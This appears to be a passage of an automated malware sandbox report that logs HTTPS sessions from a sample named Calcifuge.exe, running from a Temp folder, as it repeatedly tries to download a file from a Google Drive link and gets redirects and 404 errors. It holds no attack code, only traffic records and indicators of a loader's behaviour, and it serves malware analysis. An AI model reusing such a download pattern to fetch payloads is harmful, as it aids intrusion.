                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:16 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-b5p3NmcUp1xo1x0MLQ_7YQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              41192.168.2.453691172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:17 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:17 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQ0fDEVSCdESLiu7qFHiMo3Df33jDibUjM32xY8Wnnnrg-1UXbcv04fhgOn-5P3T2XL
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:17 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-6l1rmoCeEBb8h9XUjAIHSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:17 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 75 31 38 78 34 54 5f 78 79 35 42 6e 31 56 4f 55 58 30 45 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Du18x4T_xy5Bn1VOUX0ENQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              42192.168.2.453700172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:18 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:18 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:18 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-9RW0RdnROi91CQssVQCdpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              43192.168.2.453708172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:19 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:19 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQ90Klv6Snc7PsAzuRft5W7ZiuF6Ro8kg3evHbdBu0izI0qZK_hT0aapgI6HDAW7u4ISEXVnNE
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:19 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-69DEQxRekV8Eo3r2bUpjQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:19 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 34 63 2d 4f 4b 36 35 66 5f 34 7a 56 39 70 59 77 6a 66 52 6c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="34c-OK65f_4zV9pYwjfRlA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              44192.168.2.453716172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:20 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:20 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:20 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-_Ts2gH6hkDU6r5ph0ajppA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              45192.168.2.453722172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:21 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:22 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTc4uaSEo6QrpOmhQaovRKT5zDTB1rCcoJgk9fDy9eix_F9c93ignVFYTmB9YuzdfN3qeB23Gg
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:21 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-oMJ3axvNQWE2b_gheugbgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:22 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 53 39 2d 6e 76 78 52 57 56 56 47 44 46 6d 4a 52 79 77 5a 31 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rS9-nvxRWVVGDFmJRywZ1Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              46192.168.2.453727172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:22 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:23 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:23 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-CxTVVzreRTodpIouaU5o0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              47192.168.2.453733172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:23 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:24 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQ2VlrdF3xxGmaoJEXdrFEG-jAqB5m1o-GUEI_agm4ifUP2I_638LVMe9LB5W6pvx40luMwxak
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:24 GMT
                                                                                              Content-Security-Policy: script-src 'nonce-VKpycSgaapTKQWwjzxq95g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
